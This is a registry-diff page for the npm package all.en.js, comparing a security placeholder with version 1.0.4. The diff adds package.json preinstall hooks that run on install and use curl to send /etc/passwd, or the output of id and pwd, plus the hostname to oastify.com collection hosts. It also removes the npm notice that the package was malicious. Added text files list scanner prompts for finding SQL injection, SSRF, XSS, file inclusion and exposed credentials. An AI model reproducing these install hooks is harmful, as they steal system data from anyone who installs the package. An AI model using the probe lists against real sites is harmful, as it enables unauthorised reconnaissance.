all.en.js 0.0.1-security → 1.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of all.en.js might be problematic. Click here for more details.
- package/__init__.py +2 -0
- package/cloudsecurity.txt +9 -0
- package/commandinjection.txt +5 -0
- package/emails.txt +1 -0
- package/fileinclusion.txt +5 -0
- package/hostheaderinjection.txt +1 -0
- package/lowhangingfruits.txt +25 -0
- package/package/package.json +12 -0
- package/package.json +12 -3
- package/package.json.save +12 -0
- package/securitymisconfig.txt +27 -0
- package/sensitivedataexposure.txt +15 -0
- package/sqli.txt +8 -0
- package/ssrf.txt +8 -0
- package/webcachepoisoning.txt +7 -0
- package/xss.txt +8 -0
- package/xxe.txt +1 -0
- package/README.md +0 -5
package/__init__.py
ADDED
@@ -0,0 +1,9 @@
|
|
1
|
+
"Detect open Docker API endpoints allowing remote access"
|
2
|
+
"Detect exposed Kubernetes API servers allowing unauthenticated access"
|
3
|
+
"Find open Kubernetes Dashboard instances with weak or no authentication"
|
4
|
+
"Detect exposed Kubernetes dashboards and APIs"
|
5
|
+
"Scan for cloud metadata endpoints accessible externally"
|
6
|
+
"Detect AWS S3, GCP, Azure buckets in response, and scan this cloud storage buckets (AWS S3, GCP, Azure) for misconfigurations (read, write ACL, public access, etc)"
|
7
|
+
"Detect Azure Storage Account keys exposed in responses, minimize false positive"
|
8
|
+
"Detect AWS keys exposed in responses and write extractors, minimize false positive"
|
9
|
+
"Detect GCP keys exposed in responses and write extractors, minimize false positive"
|
@@ -0,0 +1,5 @@
|
|
1
|
+
"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting Remote Code Execution (Command Injection) vulnerabilities with pre-conditions."
|
2
|
+
"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting Remote Code Execution (RCE) vulnerabilities on Linux and Windows."
|
3
|
+
"Detect command injection in 'cmd', 'exec', 'ping', 'query', 'shell' parameters"
|
4
|
+
"Scan for OS command injection via HTTP headers (X-Forwarded-For, X-Forwarded-Host, User-Agent, Referer)"
|
5
|
+
"Identify RCE vulnerabilities in file upload functionalities"
|
package/emails.txt
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
""Extract email addresses from web pages"
|
@@ -0,0 +1,5 @@
|
|
1
|
+
"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting LFI/RFI vulnerabilities with pre-conditions."
|
2
|
+
"Find LFI in 'file', 'path', 'template', 'inc', 'lang', 'page' parameters"
|
3
|
+
"Detect RFI by injecting external URLs into 'file' and 'load' parameters"
|
4
|
+
"Identify LFI using common payloads (/etc/passwd, ../../etc/passwd, php://filter, php://input)"
|
5
|
+
"Check for LFI in error messages exposing full file paths"
|
@@ -0,0 +1 @@
|
|
1
|
+
"Detect Host Header Injection"
|
@@ -0,0 +1,25 @@
|
|
1
|
+
"Find sensitive information in HTML comments (debug notes, API keys, credentials)"
|
2
|
+
"Find exposed .env files leaking credentials, API keys, and database passwords"
|
3
|
+
"Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."
|
4
|
+
"Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."
|
5
|
+
"Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."
|
6
|
+
"Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."
|
7
|
+
"Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."
|
8
|
+
"Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."
|
9
|
+
"Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"
|
10
|
+
"Identify open directory listings exposing sensitive files"
|
11
|
+
"Find exposed .git directories allowing full repo download"
|
12
|
+
"Find exposed .svn and .hg repositories leaking source code"
|
13
|
+
"Identify open FTP servers allowing anonymous access"
|
14
|
+
"Find GraphQL endpoints with introspection enabled"
|
15
|
+
"Identify exposed .well-known directories revealing sensitive data"
|
16
|
+
"Find publicly accessible phpinfo() pages leaking environment details"
|
17
|
+
"Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"
|
18
|
+
"Identify exposed .vscode and .idea directories leaking developer configs"
|
19
|
+
"Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"
|
20
|
+
"Find exposed WordPress debug.log files leaking credentials and error messages"
|
21
|
+
"Detect misconfigured CORS allowing wildcard origins ('*')"
|
22
|
+
"Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"
|
23
|
+
"Find exposed admin panels with default credentials"
|
24
|
+
"Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."
|
25
|
+
"Detect web applications running in debug mode, potentially exposing sensitive system information."
|
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "all.en.js",
|
3
|
+
"version": "1.5.8",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"No test specified\" && exit 0",
|
8
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)t5z3z2aoxd8j5y6vdrck09vjpav1jy7n.oastify.com"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|
package/package.json
CHANGED
@@ -1,6 +1,15 @@
|
|
1
1
|
{
|
2
2
|
"name": "all.en.js",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.4",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"No test specified\" && exit 0",
|
8
|
+
"preinstall": "/usr/bin/bash -c id | /usr/bin/curl --data '@/etc/passwd' $(hostname)xlm7jju7lwjky9thu789nw41us0jodc2.oastify.com"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"all.en.js": "^1.0.4"
|
14
|
+
}
|
6
15
|
}
|
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "all.en.js",
|
3
|
+
"version": "1.5.2",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"No test specified\" && exit 0",
|
8
|
+
"preinstall": "/usr/bin/bash -c pwd | /usr/bin/curl --data @- http://$(hostname)3swtb7ket4qvyfsib1i4r5ne359wxmlb.oastify.com'"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|
@@ -0,0 +1,27 @@
|
|
1
|
+
“Find misconfigured cloud storage buckets, containers, or repositories that expose sensitive data. Check for public S3 buckets, Azure blobs, Google Cloud Storage, and similar services with improper access controls.”
|
2
|
+
“Scan for applications running with default credentials, focusing on common admin/admin, admin/password combinations, and vendor-specific default passwords. Check authentication endpoints and admin interfaces.”
|
3
|
+
“Identify web applications exposing admin panels, login pages, or administrative interfaces without proper authentication. Look for common paths like /admin, /administrator, /login, /wp-admin, and check if they are accessible without credentials.”
|
4
|
+
"Identify exposed configuration files, environment files, backup files, and sensitive directories. Look for .env files, config.php, web.config, .git folders, and similar sensitive files that might expose system information or credentials."
|
5
|
+
"Identify server misconfigurations including directory listing enabled, default server pages, unnecessary services running, outdated server versions, and insecure HTTP methods enabled. Check for exposed server status pages, phpinfo files, and server-status endpoints."
|
6
|
+
"Check for exposed server status pages, phpinfo files, and server-status endpoints."
|
7
|
+
"Detect exposed database instances, default database credentials, public-facing database admin interfaces, and misconfigured database permissions. Look for MongoDB, MySQL, PostgreSQL, Redis, and Elasticsearch instances with weak or no authentication."
|
8
|
+
"Find SSL/TLS misconfigurations including weak cipher suites, outdated protocols (SSL v2/v3, TLS 1.0/1.1), invalid certificates, expired certificates, and misconfigured certificate chains. Check for vulnerable SSL/TLS implementations."
|
9
|
+
"Identify AWS misconfigurations including public S3 buckets, exposed EBS snapshots, open security groups, IAM misconfigurations, exposed Lambda functions, and misconfigured API Gateway endpoints. Check for exposed AWS metadata endpoints."
|
10
|
+
"Identify Azure misconfigurations including exposed storage accounts, open firewalls, exposed SQL databases, and misconfigured Azure Key Vaults. Check for exposed Azure metadata endpoints."
|
11
|
+
"Identify Google Cloud misconfigurations including exposed storage buckets, open firewalls, exposed SQL databases, and misconfigured Google Cloud Key Vaults. Check for exposed Google Cloud metadata endpoints."
|
12
|
+
"Identify Kubernetes misconfigurations including exposed API servers, unsecured dashboard instances, and misconfigured RBAC policies. Check for exposed Kubernetes metadata endpoints."
|
13
|
+
"Identify Docker misconfigurations including exposed API endpoints, unsecured Swarm clusters, and misconfigured Docker Compose files. Check for exposed Docker metadata endpoints."
|
14
|
+
"Identify exposed server status pages, phpinfo files, and server-status endpoints."
|
15
|
+
"Detect CMS misconfigurations in WordPress, Drupal, Joomla, and other platforms including default admin credentials, exposed configuration files, vulnerable plugins/themes, and debug modes enabled. Check for backup files and installation pages."
|
16
|
+
"Find framework misconfigurations in popular web frameworks (Rails, Django, Laravel, Spring) including debug modes, exposed stack traces, default secrets, and development features enabled in production."
|
17
|
+
"Identify API misconfigurations including missing rate limiting, insufficient authentication, exposed internal APIs, misconfigured CORS policies, and verbose error messages. Check for exposed API documentation and testing endpoints."
|
18
|
+
"Detect DevOps tool misconfigurations including exposed CI/CD pipelines, Jenkins instances, GitLab runners, and deployment tools. Look for exposed source code repositories and build artifacts."
|
19
|
+
"Find caching misconfigurations including exposed Redis instances, Memcached servers, and Varnish admin interfaces. Check for cache poisoning vulnerabilities and misconfigured cache headers."
|
20
|
+
"Identify load balancer misconfigurations including exposed admin interfaces, misconfigured health checks, and information disclosure through headers. Check for SSL termination issues and routing misconfigurations."
|
21
|
+
"Detect exposed monitoring systems including Nagios, Zabbix, Prometheus, and Grafana instances. Look for public dashboards, metrics endpoints, and monitoring system credentials."
|
22
|
+
"Find mail server misconfigurations including open relay configurations, exposed webmail interfaces, and misconfigured SMTP/IMAP/POP3 services. Check for exposed email logs and configuration files."
|
23
|
+
"Identify network device misconfigurations including exposed management interfaces, SNMP misconfigurations, default credentials on routers/switches, and exposed network monitoring tools."
|
24
|
+
"Detect authentication system misconfigurations including exposed OAuth endpoints, SAML misconfigurations, weak password policies, and misconfigured SSO implementations. Check for exposed authentication debug endpoints."
|
25
|
+
"Find backup system misconfigurations including exposed backup files, backup software interfaces, and misconfigured backup retention policies. Look for database dumps and system backups."
|
26
|
+
"Identify logging system misconfigurations including exposed log files, log management interfaces, and debug logs containing sensitive information. Check for exposed ELK stack instances and log aggregation endpoints."
|
27
|
+
"Detect service misconfigurations including exposed RPC endpoints, messaging queues (RabbitMQ, Kafka), and misconfigured microservices. Check for service discovery endpoints and internal API exposure."
|
@@ -0,0 +1,15 @@
|
|
1
|
+
"Scan for exposed environment files (.env) containing credentials"
|
2
|
+
"Find open directory listings and publicly accessible files"
|
3
|
+
"Detect exposed .git repositories and sensitive files"
|
4
|
+
"Identify publicly accessible backup and log files (.log, .bak, .sql, .dump)"
|
5
|
+
"Detect exposed .htaccess and .htpasswd files"
|
6
|
+
"Check for SSH private keys leaked in web directories"
|
7
|
+
"Find exposed API keys and secrets in responses and URLs"
|
8
|
+
"Identify API endpoints leaking sensitive data"
|
9
|
+
"Find leaked database credentials in JavaScript files"
|
10
|
+
"Scan for hardcoded credentials in source code comments"
|
11
|
+
"Identify sensitive endpoints leaking personal or internal data"
|
12
|
+
"Detect vulnerable API endpoints exposing user input or sensitive information"
|
13
|
+
"Find exposed server status pages (e.g., phpinfo, server-status)"
|
14
|
+
"Identify sensitive configuration files (.env, .config, application.properties, settings.py)"
|
15
|
+
"Scan for information leaks in HTTP responses and headers"
|
package/sqli.txt
ADDED
@@ -0,0 +1,8 @@
|
|
1
|
+
"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting SQL Injection vulnerabilities with pre-conditions."
|
2
|
+
"Detect SQL error messages indicating SQL injection vulnerabilities"
|
3
|
+
"Detect SQL errors in response when injecting common payloads into GET and POST requests"
|
4
|
+
"Find SQL injection in 'id', 'user', 'product', 'category', 'page' parameters"
|
5
|
+
"Scan for blind SQL injection in 's', 'search', 'query', 'sort', 'filter' GET/POST parameters"
|
6
|
+
"Scan for time based SQL injection in all parameters"
|
7
|
+
"Identify SQL injection in API endpoints using JSON payloads"
|
8
|
+
"Check for SQL injection via HTTP headers (User-Agent, Referer, X-Forwarded-For, X-Forwarded-Host)"
|
package/ssrf.txt
ADDED
@@ -0,0 +1,8 @@
|
|
1
|
+
"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting SSRF vulnerabilities with pre-conditions."
|
2
|
+
"Find SSRF vulnerabilities in web applications"
|
3
|
+
"Identify SSRF vulnerabilities in query parameters"
|
4
|
+
"Identify SSRF vulnerabilities in most common parameters"
|
5
|
+
"Find SSRF in 'url', 'link', 'redirect', 'next', 'feed', 'callback' parameters"
|
6
|
+
"Detect SSRF by injecting internal IP ranges (127.0.0.1, 169.254.169.254)"
|
7
|
+
"Identify SSRF in API requests that fetch external resources"
|
8
|
+
"Scan for blind SSRF by injecting webhooks and external DNS resolver payloads"
|
@@ -0,0 +1,7 @@
|
|
1
|
+
"Find web cache poisoning via 'Host", 'X-Forwarded-Host' and'X-Forwarded-For' headers, provide additional vulnerability checking (second/third request)"
|
2
|
+
"Detect cache poisoning through 'X-Original-URL' and 'X-Rewrite-URL' headers, provide additional vulnerability checking (second/third request)"
|
3
|
+
"Identify cache poisoning by injecting payloads in 'Referer' and 'User-Agent', provide additional vulnerability checking (second/third request)"
|
4
|
+
"Scan for cache poisoning via malformed HTTP headers, provide additional vulnerability checking (second/third request)"
|
5
|
+
"Detect cache poisoning vulnerabilities on Fastly and Cloudflare, provide additional vulnerability checking (second/third request)"
|
6
|
+
"Find misconfigured Varnish caching rules exposing private data, provide additional vulnerability checking (second/third request)"
|
7
|
+
"Identify Squid proxy cache poisoning vulnerabilitie, provide additional vulnerability checking (second/third request)"
|
package/xss.txt
ADDED
@@ -0,0 +1,8 @@
|
|
1
|
+
"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting XSS vulnerabilities (Reflected, Stored, and DOM-based) with pre-conditions."
|
2
|
+
"Find reflected XSS in 'q', 'search', 's', 'redirect', 'next', 'return', 'url' parameters"
|
3
|
+
"Find stored XSS in all parameters"
|
4
|
+
"Identify stored XSS in comment fields, usernames, profile descriptions"
|
5
|
+
"Detect DOM-based XSS in JavaScript variables using common sources like location.href"
|
6
|
+
"Scan for XSS vulnerabilities in AJAX endpoints"
|
7
|
+
"Check for JSON-based XSS via API responses"
|
8
|
+
"Identify reflected cross-site scripting (XSS) vulnerabilities"
|
package/xxe.txt
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
"Perform fuzzing on all XML-based inputs using DSL, focusing on detecting XXE vulnerabilities with pre-conditions."
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=all.en.js for more information.
|